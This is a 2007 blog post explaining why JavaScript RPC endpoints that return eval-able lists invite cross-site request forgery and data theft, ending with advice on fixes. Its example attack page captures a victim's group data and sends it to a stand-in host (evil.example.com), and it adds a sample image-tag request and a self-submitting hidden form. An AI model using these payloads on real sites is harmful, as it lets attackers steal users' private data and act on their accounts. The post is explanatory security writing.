Wednesday, July 18, 2007

Why Javascript Remote Procedure Calls beget more Cross Site Request Forgeries

This is going to be a long blog post. I've tried to cut it down, but I've been thinking a lot about this topic for over a year and it's hard to walk all the way through this vulnerability without explaining a lot.

A few days ago I posted a small rant about how there were no "web 2.0 vulnerabilities" that did not also affect older websites. While that's true, the increasing popularity of sites using various javascript RPC methods is definitely leading to a rise in XSRF vulnerabilities, and I wanted to write up my thoughts on why that is.

I'm not going to talk about vanilla-HTTP-form-post-with-no-secret-token cross site request forgery here. That vulnerability has been essentially unchanged for a long time, and I'm going to pretty much ignore it; I don't have anything new to say about it at the moment.

In 1995, when I first had web access, websites were pretty basic in comparison to what we have now. To run, say, a search engine, you'd have a handler on a webserver that took user input and wrote out response HTML. It might branch off a new process to do a search, depending on the software, and then it would collect the responses and return them via HTTP to the browser.

Very shortly webpages started getting a little bit more complex. When these first dynamic web pages were made it was very difficult to decouple "backend" software from the pages that it generated. There might be a database behind the web site, and maybe that was on a different server. Most likely, though, the code that wrote to the database was wrapped up in the same binary that generated the HTML for the webpages and processed the inputs, and all of that lived on one webserver. Everything would be in, perhaps, one Perl file and a few Perl modules.

RPCs, Services, and tiers

So then, "services" started to appear. Front end code that printed out HTML was often split out into new binaries, and CSS arrived. So we got some decoupling of "code that writes HTML" from "code that inserts data into the DB" in larger websites. Soon, "code that inserts data into the DB" was moved off to another server entirely. It was the start of "multi tiered" websites.

This is a great way to build complicated websites, and there's so much written about multi tier website architecture that I'm not going to explain it here. We'll just note that the middle tier servers that, perhaps, performed various actions and returned data to the web front ends probably had a bunch of protections in place limiting who could talk to them, along with some swanky authentication. And this all generally happened over internal network connections, entirely within a particular data center. More service layers might be written, caches added and so forth, but the general architecture was the same. So let's say that a site wants to display to a user "here are the groups you belong to".

Probably this was what happened:
1. the user clicks to a URL like "example.com/showmemygroups.cgi", and the browser sends her login cookie with the request
2. the webserver gets the request and determines it's user "annika" from the cookies
3. the webserver software assembles a request object for the groups that user "annika" belongs to and makes a request to a middle tier server over some networking protocol (over an internal network connection, remember)
4. the middle tier server works magic and assembles an object that holds annika's groups, then dispatches the result to the web server software
5. the web server parses the groups object and builds an HTML page to display the data. That is returned to the user's browser via HTTP

Web 2.0
In recent years, a lot of sites have realized that you can make RPC calls in javascript. (RPC = Remote Procedure Call. Again, there's a lot written on this on the web so I won't explain it much here.) This is pretty cool: web applications are no longer bound by "click, load a page, click, load a page" and can now behave more like desktop applications. I think that this is a good thing in general. Again, many other people have written wonderful things about the rise of web services and Ajax and mashups and "the programmable web."

But now in the programmable web world, developers don't want to have to make the user go to a new page to see, perhaps, that they joined a cool group on a social networking site. They want to be able to show the user "here are your groups" on the page that they are on right now.

The browser rendering the webpage makes a GET or a POST to get the groups data, but it might talk directly to the server that used to be "the middle tier server" sitting alone in a data center and speaking only to the frontend web server. In the new model, that server might talk directly to browsers, or the code that ran on it might now run on our webserver. The data isn't just going over internal network connections anymore, so you can't easily limit what IP addresses can make these RPC calls: it's now the user's browser making the RPC call, from the user's IP address. And the data that comes back is generally in a nice, portable format, like a javascript list.
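
For example, the raw response body from such an endpoint might be nothing more than a bare, eval-able javascript list. (The field name and values here are invented for illustration.)

// hypothetical response body from a GET to the groups RPC
[ {"groupName": "knitting"}, {"groupName": "lockpicking"} ]
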
Remember those steps above? Here's what they are now:

1. the user performs an action that triggers a "getGroups" function in the "myutilities.js" file (that the page we're on included), which perhaps fires an XMLHttpRequest (or similar) call to the webserver. Then the browser sends her login cookies along with the javascript-triggered HTTP request.

2. the request goes not to the webserver software that wrote the HTML but maybe gets forwarded right to the middle tier (potentially via some URL rewriting on the server side, or some other method)

3. the middle tier server inspects the cookies it was given, sees that they belong to "annika", works magic and assembles an object that holds annika's groups, wraps it in a javascript list object, then dispatches the result to the browser

4. the browser takes the returned JS and writes it to the page that annika is viewing
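
To make that concrete, here's a minimal sketch of what a getGroups helper in a file like myutilities.js might look like. The URL, the element id, and the response format are assumptions for the sake of illustration, not any particular site's real API:

// minimal sketch of a getGroups helper, as it might appear in myutilities.js
function getGroups() {
  // era-typical XHR setup (ActiveXObject covers older IE)
  var xhr = window.XMLHttpRequest ? new XMLHttpRequest()
                                  : new ActiveXObject('Microsoft.XMLHTTP');
  xhr.open('GET', '/getGroups', true); // the browser attaches the login cookies automatically
  xhr.onreadystatechange = function () {
    if (xhr.readyState === 4 && xhr.status === 200) {
      // the response is an eval-able javascript list, e.g.
      // [ {"groupName": "knitting"}, {"groupName": "lockpicking"} ]
      var groups = eval(xhr.responseText);
      var names = [];
      for (var i = 0; i < groups.length; i++) {
        names.push(groups[i].groupName);
      }
      // assumes the page has an element with id="groups" to show them in
      document.getElementById('groups').innerHTML = names.join(', ');
    }
  };
  xhr.send(null);
}
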

So what just happened? For one, we changed who can make the RPC calls and who can access the data they return. And we changed the format of the request and the format of the response.

Notice how we lean only on cookies for authentication now. This is where I tend to lose people: there are still all those "determine the user" steps in there, so it can look just as secure as before. It's not.

An Explanation of what's broken
What happens in that scenario is that a tag like <script src="http://othersite.com/myutilities.js"> (loading the file we made above) can be placed on www.example.com, and calls to its getGroups function will still work. And the site is sending back data in a format that can be used on any third party website making the RPC call.

If we have a call to othersite.com's getGroups function on example.com, the user's browser will send the othersite.com cookies along with the getGroups request... even though the function was called from a page that comes from example.com. That just jumped us out of the usual javascript Same Domain sandboxing. The groups will come back in a javascript list and be readable by the javascript on example.com: we used the user's othersite.com credentials to request data that we wouldn't be able to request on our own. I could maybe see MY othersite.com groups, but without this technique, I can't see Annika's groups short of stealing her password.
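
Here's a sketch of what the hostile page on example.com might look like. The endpoint URL, the "groupName" field, and evil.example.com are all invented for illustration, and the capture trick (a setter on Object.prototype that fires while the returned list is being evaluated) depends on quirks in how some browsers evaluate object literals, so it may not work everywhere; but the cross-site cookie problem it demonstrates is the same either way:

<html>
  <body>
    <script>
      // set a trap: in some browsers, building the object literals inside
      // the returned list triggers this setter, handing us every groupName
      var stolen = [];
      Object.prototype.__defineSetter__('groupName', function (value) {
        stolen.push(value);
      });
    </script>

    <!-- the victim's browser sends her othersite.com login cookies with
         this request, so the response contains HER groups, not ours -->
    <script src="http://othersite.com/getGroups"></script>

    <script>
      // ship the captured data somewhere we control (hypothetical host)
      (new Image()).src = 'http://evil.example.com/collect?g=' +
                          encodeURIComponent(stolen.join(','));
    </script>
  </body>
</html>
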

Most of the security vulnerabilities I've seen arise because people don't stop to think about disclosing private data. I've seen a few account change actions exposed this way too, but not as many.

What's mostly happened is that a wrapper has been put around some old backend libraries to expose them via javascript, and then those have been used on the site. Let me point out something here: even if we did not remove the "talk to web server, web server talks to middle tier server, middle tier server returns an object" steps, this would still be insecure. The fact that we can call this code from any third party site and still have the original site's cookies get sent is what's insecure. And the format that the data comes back in allows it to be potentially read by the third party site.

Another clarification here: for private data disclosure bugs, we need the return data from othersite.com to be in a format that the rendering webpage on example.com can read. For account information changing bugs, where hitting a URL will, for example, mark that "I give this group 4 stars!", the return data does NOT need to be readable by the page on example.com.
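
For that second class of bug, the attacking page only has to trigger the request; a single image tag is enough. (The URL and parameters below are invented for illustration.)

<!-- on the hostile page: the victim's browser sends her othersite.com
     cookies with this GET, the rating gets recorded, and we never need
     to read the response -->
<img src="http://othersite.com/rateGroup?group=knitting&stars=4"
     width="1" height="1" alt="">
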

Fixing this
Can this be fixed? Yes, absolutely. It's just that I've seen a lot of naive implementations of frameworks of this sort. And a lot of people try to fix this and fail.

What is a bad fix? Checking referrer headers. There was a way to use flash to break that, and it was fixed (but who knows how many users upgraded their flash to the fixed version). And now there's a new way to do it again... I wouldn't rely on that staying fixed. Accepting only POSTs isn't going to cut it either.
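
To illustrate why requiring POST doesn't help by itself: a hostile page can simply auto-submit a hidden form, and the browser attaches the victim's cookies to that POST just as it would to a GET. (The URL and field names here are invented.)

<!-- hidden, self-submitting form on the hostile page -->
<form id="csrf" action="http://othersite.com/rateGroup" method="POST">
  <input type="hidden" name="group" value="knitting">
  <input type="hidden" name="stars" value="4">
</form>
<script>document.getElementById('csrf').submit();</script>
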

What is a good fix? Make sure that the JS returned to the browser (step #4 above) isn't a bare JS list or other eval-able JS code. Boobytrapping is good. I linked a few days ago to a site which shows good and bad ways to return data from RPCs, but here it is again:
http://jpsykes.com/47/practical-csrf-and-json-security
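
As a concrete sketch of the "don't return eval-able JS" and boobytrapping advice: the while(1); prefix below is just one common convention, and the function name is my own, not anything from that article.

// what the server sends back is booby-trapped, so a third-party page that
// script-includes the URL just hangs instead of evaluating our data:
//
//   while(1);[ {"groupName": "knitting"}, {"groupName": "lockpicking"} ]
//
// our own client code on othersite.com knows about the prefix, strips it,
// and only then evaluates the payload
function parseGuardedResponse(text) {
  var prefix = 'while(1);';   // assumed convention, matching the example above
  if (text.indexOf(prefix) !== 0) {
    throw new Error('unexpected response format');
  }
  return eval('(' + text.substring(prefix.length) + ')');
}
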

This post is really a work in progress because I'm still trying to figure out how to explain all this in a way that's clear. Criticism and feedback are welcome; my email is on my domain's homepage.
